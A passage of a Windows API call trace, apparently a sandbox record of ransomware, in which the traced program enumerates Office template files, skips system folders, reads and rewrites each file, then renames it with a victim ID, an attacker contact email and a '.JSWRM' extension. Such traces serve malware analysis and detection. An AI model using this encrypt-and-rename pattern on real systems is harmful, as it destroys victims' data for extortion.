lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2eb5, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="linesdistinctive.dotx", cAlternateFileName="LINESD~1.DOT")) returned 1 [0121.020] lstrcmpiW (lpString1="linesdistinctive.dotx", lpString2=".") returned 1 [0121.020] lstrcmpiW (lpString1="linesdistinctive.dotx", lpString2="..") returned 1 [0121.020] lstrcmpiW (lpString1="linesdistinctive.dotx", lpString2="...") returned 1 [0121.020] lstrcmpiW (lpString1="linesdistinctive.dotx", lpString2="windows") returned -1 [0121.020] lstrcmpiW (lpString1="linesdistinctive.dotx", lpString2="recovery") returned -1 [0121.020] lstrcmpiW (lpString1="linesdistinctive.dotx", lpString2="perflogs") returned -1 [0121.020] lstrcmpiW (lpString1="linesdistinctive.dotx", lpString2="documents and settings") returned 1 [0121.020] lstrcmpiW (lpString1="linesdistinctive.dotx", lpString2="$RECYCLE.BIN") returned 1 [0121.020] lstrcmpiW (lpString1="linesdistinctive.dotx", lpString2="system volume information") returned -1 [0121.020] lstrcmpiW (lpString1="linesdistinctive.dotx", lpString2="msocache") returned -1 [0121.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="linesdistinctive.dotx", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0121.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="linesdistinctive.dotx", cchWideChar=21, lpMultiByteStr=0x241010, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="linesdistinctive.dotx", lpUsedDefaultChar=0x0) returned 21 [0121.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="linesdistinctive.dotx", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0121.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="linesdistinctive.dotx", cchWideChar=21, lpMultiByteStr=0x241100, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="linesdistinctive.dotx", lpUsedDefaultChar=0x0) returned 21 [0121.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0121.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0121.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0121.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\linesdistinctive.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\linesdistinctive.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0121.022] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=11957) returned 1 [0121.022] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2eb0) returned 0x24e1d8 [0121.022] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2eb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2eb0, lpOverlapped=0x0) returned 1 [0121.024] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.024] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2eb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2eb0, lpOverlapped=0x0) returned 1 [0121.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.024] CloseHandle (hObject=0x314) returned 1 [0121.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0121.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0121.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0121.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0121.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0121.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0121.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.025] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\linesdistinctive.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\linesdistinctive.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\linesdistinctive.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\linesdistinctive.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0121.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0121.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0121.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0121.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0121.026] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f49, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="linessimple.dotx", cAlternateFileName="LINESS~1.DOT")) returned 1 [0121.026] lstrcmpiW (lpString1="linessimple.dotx", lpString2=".") returned 1 [0121.026] lstrcmpiW (lpString1="linessimple.dotx", lpString2="..") returned 1 [0121.026] lstrcmpiW (lpString1="linessimple.dotx", lpString2="...") returned 1 [0121.026] lstrcmpiW (lpString1="linessimple.dotx", lpString2="windows") returned -1 [0121.026] lstrcmpiW (lpString1="linessimple.dotx", lpString2="recovery") returned -1 [0121.026] lstrcmpiW (lpString1="linessimple.dotx", lpString2="perflogs") returned -1 [0121.026] lstrcmpiW (lpString1="linessimple.dotx", lpString2="documents and settings") returned 1 [0121.026] lstrcmpiW (lpString1="linessimple.dotx", lpString2="$RECYCLE.BIN") returned 1 [0121.026] lstrcmpiW (lpString1="linessimple.dotx", lpString2="system volume information") returned -1 [0121.026] lstrcmpiW (lpString1="linessimple.dotx", lpString2="msocache") returned -1 [0121.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="linessimple.dotx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0121.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0121.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="linessimple.dotx", cchWideChar=16, lpMultiByteStr=0x241100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="linessimple.dotx", lpUsedDefaultChar=0x0) returned 16 [0121.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="linessimple.dotx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0121.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0121.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="linessimple.dotx", cchWideChar=16, lpMultiByteStr=0x2412e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="linessimple.dotx", lpUsedDefaultChar=0x0) returned 16 [0121.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0121.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0121.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0121.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\linessimple.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\linessimple.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0121.027] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12105) returned 1 [0121.027] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f40) returned 0x24e1d8 [0121.027] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2f40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2f40, lpOverlapped=0x0) returned 1 [0121.037] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.037] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2f40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2f40, lpOverlapped=0x0) returned 1 [0121.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.038] CloseHandle (hObject=0x314) returned 1 [0121.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0121.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0121.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0121.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0121.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0121.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0121.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.038] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\linessimple.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\linessimple.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\linessimple.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\linessimple.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0121.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0121.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0121.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0121.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0121.039] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2fcc, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="linesstylish.dotx", cAlternateFileName="LINESS~2.DOT")) returned 1 [0121.039] lstrcmpiW (lpString1="linesstylish.dotx", lpString2=".") returned 1 [0121.039] lstrcmpiW (lpString1="linesstylish.dotx", lpString2="..") returned 1 [0121.039] lstrcmpiW (lpString1="linesstylish.dotx", lpString2="...") returned 1 [0121.039] lstrcmpiW (lpString1="linesstylish.dotx", lpString2="windows") returned -1 [0121.039] lstrcmpiW (lpString1="linesstylish.dotx", lpString2="recovery") returned -1 [0121.039] lstrcmpiW (lpString1="linesstylish.dotx", lpString2="perflogs") returned -1 [0121.039] lstrcmpiW (lpString1="linesstylish.dotx", lpString2="documents and settings") returned 1 [0121.039] lstrcmpiW (lpString1="linesstylish.dotx", lpString2="$RECYCLE.BIN") returned 1 [0121.039] lstrcmpiW (lpString1="linesstylish.dotx", lpString2="system volume information") returned -1 [0121.039] lstrcmpiW (lpString1="linesstylish.dotx", lpString2="msocache") returned -1 [0121.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="linesstylish.dotx", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0121.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="linesstylish.dotx", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="linesstylish.dotx", lpUsedDefaultChar=0x0) returned 17 [0121.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="linesstylish.dotx", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0121.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="linesstylish.dotx", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="linesstylish.dotx", lpUsedDefaultChar=0x0) returned 17 [0121.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0121.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0121.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0121.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\linesstylish.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\linesstylish.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0121.040] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12236) returned 1 [0121.041] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2fc0) returned 0x24e1d8 [0121.041] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2fc0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2fc0, lpOverlapped=0x0) returned 1 [0121.043] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.043] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2fc0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2fc0, lpOverlapped=0x0) returned 1 [0121.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.043] CloseHandle (hObject=0x314) returned 1 [0121.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0121.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0121.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0121.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0121.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0121.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0121.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.043] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\linesstylish.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\linesstylish.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\linesstylish.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\linesstylish.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0121.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0121.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0121.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0121.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0121.044] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2fcc, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="minimalist.dotx", cAlternateFileName="MINIMA~1.DOT")) returned 1 [0121.044] lstrcmpiW (lpString1="minimalist.dotx", 